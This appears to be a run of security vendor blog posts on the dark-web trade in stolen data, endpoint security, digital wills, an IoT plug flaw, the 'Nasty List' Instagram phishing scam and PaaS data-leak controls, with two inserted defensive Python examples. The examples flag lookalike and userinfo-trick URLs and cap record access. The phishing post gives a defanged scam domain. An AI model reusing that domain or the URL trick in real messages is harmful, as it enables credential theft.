The marketplace isn’t limited to digital purchases. Interested parties can also buy physical means of attack like credit card skimmers or USB drives loaded with malware. Recently, a former student managed to destroy 59 computers at a small college in New York in a single evening using a “USB Killer,” a USB thumb drive that discharges electrical current to fry any device to which it is connected. Though the “USB Killer” is shockingly legal to buy, such an item or a similar one is also available on the dark web to those who don’t want their purchase to be tracked. Such physical items would be particularly effective in the hands of a malicious insider who has access to workstations and servers.

The dark web is also a refuge for those who are inexperienced in digital attacks. Thousands of fraud guides are available to those eager to learn more about multiple different types of attacks like phishing, brute force, or even simple account takeovers. These guides are incredibly cheap, typically only running someone five to ten dollars. Hacking services are also readily available. The recently reopened Darkode, mentioned earlier, specializes in customized hacking jobs, as well as providing simpler services like renting a botnet to mount a DDoS attack.

An Underground Marketplace to Sell Your Breach Bounty

The goal for many types of malware is breaching systems to steal data. Attackers can use stolen credentials themselves to commit identity fraud. However, oftentimes these breaches are so large that the amount of data stolen is more than an individual could use in a lifetime. Selling these credentials is even more lucrative than using the data themselves. The dark web is the most natural and best place to sell these records. A hacker known as Gnosticsplayers has posted hundreds of millions of accounts for sale on the dark web, earning thousands of dollars in bitcoin.

Usernames and passwords are far from the only thing for sale. The dark web has someone’s entire identity for sale, from social security numbers to bank account numbers. For example, old tax returns stolen from accounting and legal firms are readily available for next to nothing. An old W2 can cost a few dollars or less, and makes it possible to file fraudulent returns, open accounts, and other identity scams.

Stolen information isn’t limited to human identities, either. Hackers are now trafficking in digital trust and machine identities as well, selling data like SSL and TLS certificates, which can be used to commit a number of different types of attacks. The more types of data that come up for sale, the less confidence organizations and users can have in the security of the internet at large.

Not for Sale: Keeping Data Off the Dark Marketplace

With seemingly endless ways to perpetrate attacks, and a ready-made spot to sell the bounty of these attacks, it’s easy to feel daunted at the prospect of how to put up defenses. However, there are plenty of ways for your organization to prevent or remediate any threats from the dark web. 

Just as you keep locks on every door and window to your house, so should you protect every endpoint in your organization. While antivirus on workstations is routine, a high priority should also be placed on server-specific, native antivirus for your servers, which are the key storage areas data attackers and threat actors are eager to exploit. Internet of Things (IoT) devices are becoming commonplace in the workplace, but preventative security specific to such devices is difficult to find. Given the prevalence of botnets on the dark web, it’s critical to ensure that your smart device is not part of such a network. Advanced threat detection solutions are the best way to find out if any IoT device, be it tablet or MRI machine, is infected with malware or being used for malicious purposes.

Insider threats should also be strongly considered when evaluating solutions. Insiders naturally have more access to data, and a simple purchase from the dark web could devastate an organization without proper monitoring and controls. Security solutions that enforce least privilege and detect anomalies within an organization can help defend against insider threats.

Monitoring can be provided by SIEM solutions, which filter numerous data sources and provide helpful insights through normalization and correlation. They can also identify suspicious behavior inside and outside of your organization through real-time updates, threat prioritization, and reducing the number of interfaces in need of monitoring.

Control can be achieved with identity and access management (IAM) solutions, which enable a robust approach to managing and governing access by applying the principle of least privilege: granting users only the access they need, when and how they need it. Employees require some access to complete their job, but not universal access, which can be all too tempting to exploit.

Finally, what better way to prevent being attacked than by thinking like the attackers? Penetration tests utilize ethical hacking to safely exploit security vulnerabilities, providing organizations insight and enabling remediation before an attack ever takes place. Regular penetration testing keeps organizations up to date on the latest strategies and tactics used by threat actors and the tools available to them on the dark web. Threat actors thrive in environments where individuals and organizations remain ignorant, hoping that their fear will overwhelm them into inaction. Staying vigilant and being proactive about building a strong security portfolio to set up barriers to your data is the best way to keep your information safe in your own databases, and off the dark web.

Interested in learning more?

See how these solutions will work for your specific IT environment by seeing them in action. Request a personalized demo from one of our experts today.

Effective Endpoint Security Strategy 101

Every organization wants to expedite processes, reduce costs, and bolster their staff. And in today’s modern digital world, these objectives are largely attainable, but can occasionally come with some unwanted side effects. With all the devices an organization uses to achieve its business’ goals, things can occasionally get lost in the shuffle, and cybersecurity issues can emerge as a result. Balancing your business’ objectives while ensuring your organization’s data is secure can be a challenge for many. But that challenge can be assuaged by addressing cyberthreats at the start – the endpoint. Adopting an effective endpoint protection strategy is crucial for a modern-day organization and defines a strong security posture. In fact, the importance of endpoint security has even caught the eye of venture capital firms, who are investing billions a year in the cybersecurity sector. But what exactly are the components of a successful endpoint security strategy? Let’s break it down.

Ensure the Basics Are in Place

If there’s one thing my previous experience with consumer security has taught me, it’s that the proliferation of connected devices is showing no signs of slowing. The same goes for the connected devices leveraged by businesses day in and day out. Organizations often give multiple devices to their workers that will be used to communicate and contain crucial business-specific information. These devices are used by employees that go just about anywhere and do just about everything, so it’s important businesses equip their people with the tools they need to protect these devices and the data they store.

The first important tool – VPNs, or Virtual Private Networks. The modern workforce is a mobile one, and professionals everywhere are carrying their devices with them as they travel and connect to public Wi-Fi networks. Public Wi-Fi networks are not typically the most secure, and VPNs can help ensure those mobile devices connect securely to avoid potentially exposing data.

These devices should always have strong authentication as well, which acts as the first line of defense for any security issues that arise. Remind everyone that their devices should be locked with a strong and complex password that acts as the gatekeeper for their device. That way, the company will be protected if that individual endpoint device becomes lost or stolen.

Empower Your Employees to Do Their Part

One of the most important tools to equip your employees with is proper security training. In order to keep endpoint devices safe and networks secure, employees should undergo regular security training sessions. This training should keep everyone up-to-date on the latest threats, the necessary precautions they need to take when browsing the web, and how their individual devices can impact an organization’s network.

One main point to hit upon during employee security training – the importance of updates. Updating your device software can feel like a menial task, but the gravity behind the ask cannot be overstated. Outdated software was the cause of the WannaCry global cyberattack and will be a differentiator moving forward for when attacks do come after individual endpoint devices.

Make Predictive Technology an Essential

Now, in order to anticipate major cyberattacks like WannaCry, adopting predictive technology for your endpoint security strategy is of the utmost importance, as these innovations can be used to guide your incident response strategy. Take it from hundreds of IT professionals, who in a recent SANS survey expressed that predictive technologies – such as machine learning (ML) and artificial intelligence (AI) – are required in order to go from already knowing bad elements to focusing on identification of abnormal behavior.

ML and AI technology are also particularly crucial for visibility. This technology can empower security teams to gain insight into their endpoint detection and response systems, which automatically reduces the time required to address threats. Therefore, businesses need to have this predictive technology in place to anticipate and quickly gain insight into all threats affecting their organization’s network.

Adopt Innovative Technology

For those unsure where to start when it comes to AI and ML, there’s good news – there are actually endpoint security solutions out there that have predictive technology included in their build. Solutions such as McAfee MVISION Mobile and McAfee MVISION Endpoint have machine learning algorithms and analysis built into their architecture to help identify malicious behavior and attack patterns affecting endpoint devices.

Innovative solutions such as these will act as the cherry on top of your endpoint security strategy. So, it is crucial to take the time to invest in the right technology, irrespective of the nature of your enterprise. By creating the right combination of process and product, your organization’s network will be secure, and you won’t have to pick between business growth and a healthy security posture.

To learn more about effective endpoint security strategy, be sure to follow us @McAfee and @McAfee_Business, and read more in our latest paper: Five Ways to Rethink Your Endpoint Protection Strategy.

The post Effective Endpoint Security Strategy 101 appeared first on McAfee Blogs.

Veracode Is Named a Leader for Sixth Time in Gartner Magic Quadrant for Application Security Testing

Veracode has been named a Leader in the Gartner Inc. 2019 Magic Quadrant for Application Security Testing, marking our sixth year as a Leader.

We’re excited to again be recognized as a Leader in the industry. We believe Gartner continues to place Veracode in this position because of our vision in application security testing and our ability to cover the entire software development lifecycle (SDLC), from code to deployment, with services and support that help development teams with challenges, and a new analytics engine that shows performance in real-time.

It has been an incredible start to the year – customers are scanning more applications than ever before with Veracode, and are achieving unprecedented results with their AppSec programs. We’re dedicated to helping companies achieve a frictionless SDLC in which security and development teams work in collaboration without slowing down business outcomes.

The AppSec market is growing at a rapid pace, and far more quickly than other security sectors.

The report’s authors, Ayal Tirosh, Mark Horvath, and Dionisio Zumerle, state in the report: "Through 2022, the AST market is projected to have a 10% compound annual growth rate (CAGR). This continues to be a fast-growing segment in the information security space, which itself is expected to grow at a five-year CAGR of 9%. The AST market size is estimated to reach $1.15 billion by the end of 2019."1

It’s not difficult to understand why – 111 billion lines of new code are written each year, a figure that will only go up because software powers the world around us. And that software is constantly being updated, and must be kept secure to prevent vulnerabilities from being exploited by both sophisticated and simplistic attacks. A new layer of complexity arises when you take into account compliance with privacy laws such as GDPR and PCI that seek to ensure companies have policies and practices in place to protect data.

Companies across industries are changing how they create and use software, seeking a competitive edge by taking modern approaches such as DevSecOps, Agile, microservices, cloud native apps, and APIs. However, these changes mean that organizations face even greater challenges to secure software that is being created rapidly and in new environments.

Veracode has redoubled its efforts to bring innovative products to customers to help them not only meet the challenges they encounter, but also to make secure software one of the reasons they are emboldened to change the world. Our solutions are designed for developers to excel at their jobs while coding securely.

We recently enhanced our platform with accelerated dynamic application security testing (DAST) using a new scalable architectural approach that allows for seamless deployment. With Veracode DAST, customers can easily configure to scan internal applications in the cloud, within containers, on a virtual machine or bare metal; customize scans for organizational compliance; and scan multiple applications using a single endpoint.

In addition, our focus on developer needs remains a core value at Veracode:

  • Veracode’s Software Composition Analysis (SCA) offering currently covers more than 1.9 million different and unique open source libraries, and almost 17.3 million different versions of those libraries.
  • Veracode Greenlight finds security defects in your code in seconds so you can fix findings directly in the IDE.
  • We support more than 100 languages and frameworks, including support for Go, Scala, and Python.

The thinking around software security is changing – is your company changing with it?

To download the 2019 Gartner Magic Quadrant for Application Security Testing, please visit here.

1. Gartner, Inc. “Magic Quadrant for Application Security Testing” by Ayal Tirosh, Mark Horvath, and Dionisio Zumerle, April 18, 2019.

Gartner does not endorse any vendor, product or service depicted in its research publications, and does not advise technology users to select only those vendors with the highest ratings or other designation. Gartner research publications consist of the opinions of Gartner's research organization and should not be construed as statements of fact. Gartner disclaims all warranties, expressed or implied, with respect to this research, including any warranties of merchantability or fitness for a particular purpose.

Here’s a Codicil to Add to Your Will – Disposal of Your Digital Assets

Codicil to Add to your Will – Disposal of Your Digital Assets

We were still in shock over the sudden demise of a dear family friend. But the bereaved family had no time for grieving. The gentleman had not left any will and no one had any clear idea about his financial and physical assets. The family was running from pillar to post, trying to sort out the mess.

“Tomorrow, you and I will go meet our lawyer and find out how to draw up our will. I want us to leave everything in order, with specific instructions, so that there are no complications for the kids later,” announced my spouse one fine morning.

I readily agreed; however, I had a question.

“OK, but what about our digital assets?”

The spouse looked confused and so I continued, “Shouldn’t we also make arrangements for how we want our digital assets to be handled post our decease?”

Most of us in the age group of 40-60 years are active in the digital world in a big way, with multiple online accounts, from social media, banking, travel booking, trading, e-mail and e-transactions to blogs, e-wallets and home services. We share personal photos and videos online. We also deal with virtual currency, the records of which are stored online. The sum of all this digital data is loosely termed our digital assets.

You may wonder what’s the big deal about a will for digital assets, as some may not even have any monetary value. Well, it will help in identifying your legal successor, who can make decisions about your online accounts. Otherwise, your beneficiaries will have to run around searching for passwords, filling up forms, submitting requests at various places and so on. Secondly, your family needs to know about any outstanding bills you may have received via email or a credit card program, or financial payments due to you.

A will outlining usernames and passwords for all accounts and detailing what you want to be done with your digital assets will make it easier for your beneficiaries to take the right actions. Also, it will allow your family to continue receiving the payments from your online investments, or even payment from your blog site!

Prepare ahead

You can take any of these three steps:

a- Explain to your family about all your online accounts and passwords

b- Write down all details in a diary and keep it where it can be easily found

c- Create a will outlining your wishes and specifications regarding your digital assets

The first two options call for sharing passwords beforehand, something that you may not be comfortable with. So, the third option is the best available. Go for it and your dear ones will bless you for your foresight.

Be proactive about your online presence

  • There may be content on your accounts you would not want others to see. We may create or download content that we would like to keep private. The best thing to do is to regularly sanitize accounts and delete what you don’t want others to see.
  • Inactive accounts and profiles are much in demand: cybercriminals want access to inactive accounts to create false IDs and fake profiles. They can also create problems for friends and families of the users.

While most of our generation limit themselves to a handful of social media accounts, below are a few handy guidelines for securing key social media accounts:

Facebook

The social media giant allows you to appoint a legal heir who can either opt to memorialize the account or delete it permanently. They will not offer login information to the family though.

Instagram

Just like Facebook, Instagram too offers the option of either getting an account deleted or memorialized, after they receive a valid request. They also pledge to take measures to protect the privacy of the deceased person by securing the account.

YouTube

YouTube does not yet offer any facility for preserving or deleting content created by users. In fact, it regularly deletes inactive or dead accounts, which is quite understandable, given the huge volumes of uploads per minute.

Twitter

It allows legal successors to place a request for deactivation of the account. They will guide you through the process, which is similar to that of Facebook and Instagram.

LinkedIn

The legal successors/family members need to approach them with certain information and fill out a form shared on their site. They will then close the account and remove the profile.

Google

Sign into Google -> My Account -> Personal Info & Privacy -> Inactive Account Manager -> setup. Then add up to 10 trusted people who will be notified if you have been inactive for a specified period. You can leave them a last message and they can also download the data that you have chosen to share with them – like emails, passwords saved by Google, photos in Drive etc.

Or else, you can ask Google to delete your entire account after a certain amount of inactivity.

Microsoft including Outlook

Similarly, legal successors can inform Microsoft to close down the account and download any information you may have chosen to share with them.

In conclusion

So, you see, if you leave everything written and registered in your will, your dear ones will have less to bother about. Also, it’s our duty as well, for this is the digital world and we are the digital natives. It is about time we start doing things right in cyberspace too, so as to not leave behind a legacy of clutter, confusion and possible cybercrime.

Always keep your devices secured with advanced security tools like McAfee Total Protection so that cyber criminals don’t get to your data before your heirs do.

The post Here’s a Codicil to Add to Your Will – Disposal of Your Digital Assets appeared first on McAfee Blogs.

How Business can address the Security Concerns of Online Shoppers

It’s no secret that cybersecurity is an epidemic problem that affects online businesses on a global scale. E-commerce businesses are especially affected by data breaches because they weaken consumers’ trust in online businesses to protect their personal data. In response to the growing number of breaches, governments and enterprises alike are stepping up to the plate to provide sustainable solutions to the problem.

The UK is aiming to become a world leader in cybersecurity by investing a substantial amount of money (to the tune of £70 million) in the Industrial Strategy Challenge Fund. The fund represents the government’s commitment to increase funding in research and development by £4.7 billion over a four-year period. One of the primary goals of the investment will be to supply the industry with the money necessary to design and develop state-of-the-art hardware that’s more secure and resilient to common cyber threats.

The logic stems from the fact that cybercriminals are constantly finding new ways to exploit current technology, so the best way to combat future attacks is to design chips and hardware with stronger security features built into them to outpace cyber threats. However, this means businesses will have to invest in new IT systems as the new hardware rolls out to keep their security measures up to par.

For the time being, online business owners need to do everything in their power to address the privacy concerns of their users. In some cases, this might mean investing in more secure and modern e-commerce platforms that offer security features, such as TLS (still commonly known as SSL) protection and security software to protect against malware attacks, or simply generating new, strong admin passwords on a regular basis.

The fact is, there is no way to provide customers with a 100% guarantee their personal data is safe, but there are actions webmasters and companies can take to make their websites a lot safer for their customers to use. To help you learn more about how you can secure your site from cyber threats, Wikibuy has laid out 15 steps in the infographic below.


How Business Owners Can Address Online Shopping Concerns

McAfee ATR Team Discovers New IoT Vulnerability in Wemo Insight Smart Plugs

*This blog is originally from August 2018 and was updated April 2019*

From connected baby monitors to smart speakers — IoT devices are becoming commonplace in modern homes. Their convenience and ease of use make them seem like the perfect gadgets for the whole family. However, users can be prone to putting basic security hygiene on the backburner when they get a shiny new IoT toy, such as applying security updates, using complex passwords for home networks and devices, and isolating critical devices or networks from IoT. Additionally, IoT devices’ poor security standards make them conveniently flawed for someone else: cybercriminals, as hackers are constantly tracking flaws which they can weaponize. When a new IoT device is put on the market, these criminals have a new opportunity to expose the device’s weaknesses and access user networks. As a matter of fact, our McAfee Labs Advanced Threat Research team uncovered a flaw in one of these IoT devices: the Wemo Insight Smart Plug, which is a Wi-Fi–connected electric outlet.

Once our research team figured out how exactly the device was vulnerable, they leveraged the flaw to test out a few types of cyberattacks. The team soon discovered an attacker could leverage this vulnerability to turn off or overload the switch, which could overheat circuits or turn a home’s power off. What’s more – this smart plug, like many vulnerable IoT devices, creates a gateway for potential hackers to compromise an entire home Wi-Fi network. In fact, using the Wemo as a sort of “middleman,” our team leveraged this open hole in the network to power a smart TV on and off, which was just one of many things that could have been done.

And as of April 2019, the potential of a threat born from this vulnerability seems as possible as ever. Our ATR team even has reason to believe that cybercriminals already have or are currently working on incorporating the unpatched Wemo Insight vulnerability into IoT malware. IoT malware is enticing for cybercriminals, as these devices are often lacking in their security features. With companies competing to get their versions of the latest IoT device on the market, important cybersecurity features tend to fall by the wayside. This leaves cybercriminals with plenty of opportunities to expose device flaws right off the bat, creating more sophisticated cyberattacks that evolve with the latest IoT trends.

Now, our researchers have reported this vulnerability to Belkin, and, almost a year after initial disclosure, are awaiting a follow-up. However, regardless of whether you’re a Wemo user or not, it’s still important you take proactive security steps to safeguard all your IoT devices. Start by following these tips:

  • Keep security top of mind when buying an IoT device. When you’re thinking of making your next IoT purchase, make sure to do your research first. Start by looking up the security standards of the device in question. A simple Google search on the product, as well as the manufacturer, will often do the trick.
  • Change default passwords and do an update right away. If you purchase a connected device, be sure to first and foremost change the default password. Default manufacturer passwords are rather easy for criminals to crack. Also, your device’s software will need to be updated at some point. In a lot of cases, devices will have updates waiting for them as soon as they’re taken out of the box. The first time you power up your device, you should check to see if there are any updates or patches from the manufacturer.
  • Keep your firmware up-to-date. Manufacturers often release software updates to protect against these potential vulnerabilities. Set your device to auto-update, if you can, so you always have the latest software. Otherwise, just remember to consistently update your firmware whenever an update is available.
  • Secure your home’s internet at the source. These smart home devices must connect to a home Wi-Fi network in order to run. If they’re vulnerable, they could expose your network as a result. Since it can be challenging to lock down all the IoT devices in a home, utilize a solution like McAfee Secure Home Platform to provide protection at the router-level.

And, of course, to stay on top of the latest consumer and mobile security threats, be sure to follow me and @McAfee_Home on Twitter, listen to our podcast Hackable? and ‘Like’ us on Facebook.

The post McAfee ATR Team Discovers New IoT Vulnerability in Wemo Insight Smart Plugs appeared first on McAfee Blogs.

The “Nasty List” Phishing Scam Is out to Steal Your Instagram Login

How often do you check your social media accounts? According to a recent study, internet users spend an average of 2 hours and 22 minutes per day on social networking platforms. Since users are pretty reliant on social media, cybercriminals use it as an avenue to target victims with various cyberattacks. The latest social media scheme called “The Nasty List” scams users into giving up their Instagram credentials and uses their accounts to further promote the phishing scam.

So, how exactly do hackers trick innocent users into handing over their login information? Cybercriminals spread this scam by sending messages through hacked accounts to the user’s followers, stating that they were spotted on a “Nasty List.” These messages will read something like “OMG your actually on here, @TheNastyList_34, your number is 15! its really messed up.” If the recipient visits the profile listed in the message, they will see a link in the profile description. An example of one URL that has been listed in these scam profiles is nastylist-instatop50[.]me. The user is tricked into believing that this link will supposedly allow them to see why they are on this list. This link brings up what appears to be a legitimate Instagram login page. When the victim enters their credentials on the fake login page, the cybercriminals behind this scheme will be able to take over the account and use it to further promote the scam.

Images courtesy of Bleeping Computer.

Fortunately, there are a number of steps Instagram users can take to ensure that they don’t fall victim to this trap. Check out the following tips:

  • Be skeptical of messages from unknown users. If you receive a message from someone you don’t know, it’s best to ignore the message altogether or block the user. Additionally, if you think a friend’s social media account has been compromised, look out for spelling mistakes and grammatical errors in their message, which are common in these scams.
  • Exercise caution with links sent to you in messages. Always inspect a URL before you click on it. In the case of this scam, the URL that leads to the fake login page is clearly incorrect, as it ends in [.]me.
  • Reset your password. If your account was hacked by ‘The Nasty List’ but you still have access to your account, reset your password to regain control of your account.
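The URL inspection tip above can be turned into a check. This is an added example, not code from the original post; the set of legitimate Instagram hosts is an assumption, and the defanged scam domain is the one quoted in the post.

```python
"""Classify a link from a social-media message by where it really points.

Added example for the "Nasty List" scam described above; not code from the
original post. LEGIT_HOSTS is an assumption for this example.
"""
from urllib.parse import urlsplit

# Hosts treated as Instagram's own (assumption for this example).
LEGIT_HOSTS = {"instagram.com", "www.instagram.com"}


def refang(indicator: str) -> str:
    """Turn a defanged indicator such as nastylist-instatop50[.]me back into a URL."""
    text = indicator.replace("[.]", ".").replace("hxxp", "http")
    if "://" not in text:
        text = "http://" + text
    return text


def host_is_instagram(host: str) -> bool:
    """True only if the registrable host is Instagram itself or a subdomain of it."""
    host = host.lower().rstrip(".")
    return host in LEGIT_HOSTS or host.endswith(".instagram.com")


def classify(url: str) -> str:
    """Return 'legit', 'insecure', 'lookalike' or 'untrusted' for a link.

    urlsplit().hostname already discards userinfo, so a link such as
    https://www.instagram.com@evil.example/ resolves to evil.example, and a
    path containing instagram.com does not count either.
    """
    parts = urlsplit(refang(url))
    host = (parts.hostname or "").lower().rstrip(".")
    if not host_is_instagram(host):
        # A host that merely contains "insta" is the typical phishing lookalike.
        return "lookalike" if "insta" in host else "untrusted"
    if parts.scheme != "https":
        return "insecure"
    return "legit"
```
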

And, as usual, to stay updated on all of the latest consumer and mobile security threats, follow @McAfee_Home  on Twitter, listen to our podcast Hackable?, and ‘Like’ us on Facebook.

The post The “Nasty List” Phishing Scam Is out to Steal Your Instagram Login appeared first on McAfee Blogs.

Our PaaS App Sprung a Leak

Many breaches start with an “own goal,” an easily preventable misconfiguration or oversight that scores a goal for the opponents rather than for your team. In platform-as-a-service (PaaS) applications, the risk profile of the application can lure organizations into a false sense of security. While overall risk to the organization can be lowered, and new capabilities otherwise unavailable can be unlocked, developing a PaaS application requires careful consideration to avoid leaking your data and making the task of your opponent easier.

PaaS-integrated applications are nearly always multistep service architectures, leaving behind the simplicity of yesterday’s three-tier presentation/business/data logic applications and basic model-view-controller architectures. While many of these functional patterns are carried forward into modern applications—like separating presentation functions from the modeled representation of a data object—the PaaS application is nearly always a combination of linear and non-linear chains of data, transformation, and handoffs.

As a simple example, consider a user request to generate a snapshot of some kind of data, like a website. They make the request through a simple portal. The request would start a serverless application, which applies basic logic, completes information validation, and builds the request. The work goes into a queue—another PaaS component. A serverless application figures out the full list of work that needs to be completed and puts those actions in a list. Each of these gets picked up and completed to build the data package, which is finally captured by another serverless application to an output file, with another handoff to the publishing location(s), like a storage bucket.

Planning data interactions and the exposure at each step in the passing process is critical to the application’s integrity. The complexity of PaaS is that the team must consider threats both for each script/step at a basic level individually as well as holistically for the data stores in the application. What if I could find an exploit in one of the steps to arbitrarily start dumping data? What if I found a way to simply output more data unexpectedly than it was designed to do? What if I found a way to inject data instead, corrupting and harming rather than stealing?

The familiar threats of web applications are present, and yet our defensive posture is shaped by which elements of the applications we can see and which we cannot. Traditional edge and infrastructure indicators are replaced by a focus on how we constructed the application and how to use cloud service provider (CSP) logging together with our instrumentation to gain a more holistic picture.

In developing the overall application, the process architecture is as important as the integrity of individual technical components. The team leadership of the application development should consider insider, CSP, and external threats, and consider questions like:

  • Who can modify the configuration?
  • How is it audited? Logged? Who monitors?
  • How do you discover rogue elements?
  • How are we separating development and production?
  • Do we have a strategy to manage exposure for updates through blue/green deployment?
  • Have we considered the larger CSP environment configuration to eliminate public management endpoints?
  • Should I use third-party tools to protect access to the cloud development and production environment’s management plane, such as a cloud access broker, together with cloud environmental tools to enumerate accounts and scan for common errors?

In the PaaS application construction, the integrity of basic code quality is magnified. The APIs and/or the initiation processes of serverless steps are the gateway to the data and other functions in the code. Development operations (DevOps) security should use available sources and tools to help protect the environment as new code is developed and deployed. These are a few ways to get your DevOps team started:

  • Use the OWASP REST Security Cheat Sheet for APIs and code making calls to other services directly.
  • Consider running tools from your CSP, such as the AWS Well-Architected Tool, on a regular basis.
  • Use wrappers and tie-ins to the CSP’s PaaS application, such as AWS Lambda Layers, to identify critical operational steps and use them to implement key security checks.
  • Use integrated automated fuzzing/static test tools to discover common missteps in code configuration early and address them as part of code updates.
  • Consider accountability expectations for your development team. How are team members encouraged to remain owners of code quality? What checks are necessary to reduce your risk before considering a user story or a specific implementation complete?

The data retained, managed, and created by PaaS applications has a critical value—without it, few PaaS applications would exist. Development teams need to work with larger security functions to consider the privacy requirements and security implications and to make decisions on things like data classification and potential threats. These threats can be managed, but the specific countermeasures often require a coordinated implementation between the code to access data stores, the data store configuration itself, and the dedicated development of separate data integrity functions, as well as a disaster recovery strategy.

Based on the identified risks, your team may want to consider:

  • Using data management steps to reduce the threat of data leakage (such as limiting the amount of data or records which can be returned in a given application request).
  • Looking at counters, code instrumentation, and account-based controls to detect and limit abuse.
  • Associating requests to specific accounts/application users in your logging mechanisms to create a trail for troubleshooting and investigation.
  • Recording data access logging to a hardened data store and, if the sensitivity/risk of the data store requires it, transitioning logs to an isolated account or repository.
  • Asking your development team what the business impact might be of corrupting the value of your analysis, or the integrity of the data set itself, for example by an otherwise authorized user injecting trash.
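Three of the controls listed above (a hard cap on records per request, a per-account abuse counter, and account-attributed access logging) applied to one serverless-style handler. This is an added example, not the post’s code; the in-memory store, the limits and the account ids are constructed, and in a real deployment the counter would live in a shared cache or table rather than process memory.

```python
"""Data-leak controls for a PaaS request handler.

Added example for the recommendations above; not the post's own code. The
dataset, limits and account ids are constructed for this example.
"""
import json
import logging
from collections import defaultdict

log = logging.getLogger("snapshot-api")

MAX_RECORDS_PER_REQUEST = 100   # hard cap, regardless of what the caller asks for
MAX_REQUESTS_PER_WINDOW = 5     # per-account budget per window (assumption)

# Constructed data store: 1,000 synthetic records.
DATASET = [{"id": i, "value": f"record-{i}"} for i in range(1000)]

# Per-account request counters keyed by (account_id, window). In-memory only
# for the example; a real function would use a shared store.
_counters = defaultdict(int)


def handle_snapshot_request(event: dict, window: str) -> dict:
    """Serve a bounded page of records to an authenticated account.

    `event` mimics the JSON body a serverless function receives; `window` is
    the current rate-limit window (e.g. a minute timestamp), passed in by the
    caller so the example is deterministic. Returns an HTTP-style response.
    """
    account = event.get("account_id")
    if not account:
        # Never serve anonymous requests: attribution is what makes the log useful.
        log.warning(json.dumps({"event": "rejected", "reason": "no_account"}))
        return {"status": 401, "error": "missing account_id"}

    # Abuse counter: per-account control to detect and limit excessive requests.
    _counters[(account, window)] += 1
    if _counters[(account, window)] > MAX_REQUESTS_PER_WINDOW:
        log.warning(json.dumps({"event": "rate_limited", "account": account, "window": window}))
        return {"status": 429, "error": "rate limit exceeded"}

    # Record cap: clamp the requested size so one request can never dump the store.
    requested = int(event.get("limit", MAX_RECORDS_PER_REQUEST))
    limit = max(1, min(requested, MAX_RECORDS_PER_REQUEST))
    offset = max(0, int(event.get("offset", 0)))
    page = DATASET[offset:offset + limit]

    # Attributed access log: who asked, what they asked for, what they got.
    log.info(json.dumps({
        "event": "data_access", "account": account, "window": window,
        "requested": requested, "returned": len(page), "offset": offset,
    }))
    return {"status": 200, "account": account, "returned": len(page), "records": page}
```
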

PaaS applications offer compelling value, economies of scale, new capabilities, and access to advanced processing otherwise out of reach for many organizations in traditional infrastructure. These services require careful planning, coordination of security operations and development teams, and a commitment to architecture in both technical development and managing risk through organizational process. Failing to consider and invest in these areas while rushing headlong into new PaaS tools might lead your team to discover that your app has sprung a leak!

The post Our PaaS App Sprung a Leak appeared first on McAfee Blogs.

From Internet to Internet of Things

Thirty years ago, Tim Berners-Lee set out to accomplish an ambitious idea – the World Wide Web. While most of us take this invention for granted, we have the internet to thank for the technological advances that make up today’s smart home. From smart plugs to voice assistants – these connected devices have changed the modern consumer digital lifestyle dramatically. In 2019, the Internet of Things dominates the technological realm we have grown accustomed to – which makes us wonder, where do we go from here? Below, we take a closer look at where IoT began and where it is headed.

A Connected Evolution

Our connected world started to blossom with our first form of digital communication in the late 1800s – Morse code. From there, technological advancements like the telephone, radio, and satellites made the world a smaller place. By the time the 1970s came about, email became possible through the creation of the internet. Soon enough the internet spread like wildfire, and in the 1990s we got the invention of the World Wide Web, which revolutionized the way people lived around the world. Little did Berners-Lee know that his invention would be used decades, probably even centuries, later to enable the devices that contribute to our connected lives.

Just ten years ago, there were less than one billion IoT devices in use around the world. In the year 2019, that number has been projected to skyrocket to over eight billion throughout the course of this year. In fact, it is predicted that by 2025, there will be almost twenty-two billion IoT devices in use throughout the world. Locks, doorbells, thermostats and other everyday items are becoming “smart,” while security for these devices is lacking quite significantly. With these devices creating more access points throughout our smart homes, it is comparable to leaving a backdoor unlocked for intruders. Without proper security in place, these devices, and by extension our smart homes, are vulnerable to cyberattacks.

Moving Forward with Security Top of Mind

If we’ve learned one thing from this technological evolution, it’s that we aren’t moving backward anytime soon. Society will continue to push the boundaries of what is possible – like taking the first picture of a black hole. However, in conjunction with these advancements, to steer in the right direction, we have to prioritize security, as well as ease of use. For these reasons, it’s vital to have a security partner that you can trust, that will continue to grow to not only fit evolving needs, but evolving technologies, too. At McAfee, we make IoT device security a priority. We believe that when security is built in from the start, user data is more secure. Therefore, we call on manufacturers, users, and organizations to all equally do their part to safeguard connected devices and protect precious data. From there, we can all enjoy these technological advancements in a secure and stress-free way.

Interested in learning more about IoT and mobile security trends and information? Follow @McAfee_Home on Twitter, and ‘Like’ us on Facebook.

The post From Internet to Internet of Things appeared first on McAfee Blogs.

The Mute Button: How to Use Your Most Underrated Social Superpower

For a Monday, the school day was turning out to be surprisingly awesome. Mackenzie sat with friends at lunch, chatted with her favorite teacher, and aced her English test.

Then came the shift.

It happened between 5th and 6th period when Mackenzie checked her Instagram account. One glance showed several posts from the popular girls (yet another party I wasn’t invited to, she thought). She saw her friend Emma’s Spring Break photos (how can someone look that good in a bikini, she wondered) followed by several whos-dating-who posts from blissful looking couples (when is someone going to love me, she mused). In less than 60 seconds, the images and comments Mackenzie saw had the power to subtly alter her heart and mind.

FOMO

Mackenzie isn’t alone. Studies have repeatedly linked social networks with high levels of anxiety, depression, bullying and an emotional phenomenon called FOMO (fear of missing out) among teens and — if we’re honest — among plenty of adults.

We can’t control the perpetual stream of photos, comments, and videos that flood our social feeds. Social is here to stay, and to some extent, most of us are required to be online. However, we can control the amount and the quality of the content that comes at us. And, we can teach our kids to do the same.

It’s called the mute button, and it could be your family’s most underrated superpower when it comes to enjoying life online. Many people either don’t know about their mute button or forget they have it.

The mute button allows you to turn off someone’s feed (yes—make it vanish) without the awkwardness of unfollowing or unfriending them. The cool part: No one knows you’ve muted them, so there are no hurt feelings. You can still view a muted person’s profile, and they can see yours. You can send or receive direct messages as if everything were copacetic.

How to mute

Thankfully, you can mute people easily on most social networks.

To mute someone on Instagram, go to the person’s page, find the three little dots in the upper right of the page, click and choose mute (you can choose to mute their feed and their stories). You can mute someone on Facebook by going to the person’s main page and clicking the “friends” button under their photo. You will have the option to “unfollow,” which will mute the person’s content but allow you to stay friends. On Twitter, you can stop seeing a person’s tweets by going to the three dots in the upper right corner and choosing “mute.”

This simple, powerful click will allow you to curate what you see in your feed every day and instantly block the content that is annoying or negative. The result? Fewer emotional darts are flying at you randomly throughout the day and, hopefully, a more enjoyable, positive experience online.

When to mute

What’s considered annoying or offensive to one person may be entirely acceptable and even enjoyable to someone else. So, the reasons for muting someone can vary greatly.

A few reasons to mute might be: 

  • Inappropriate or offensive content
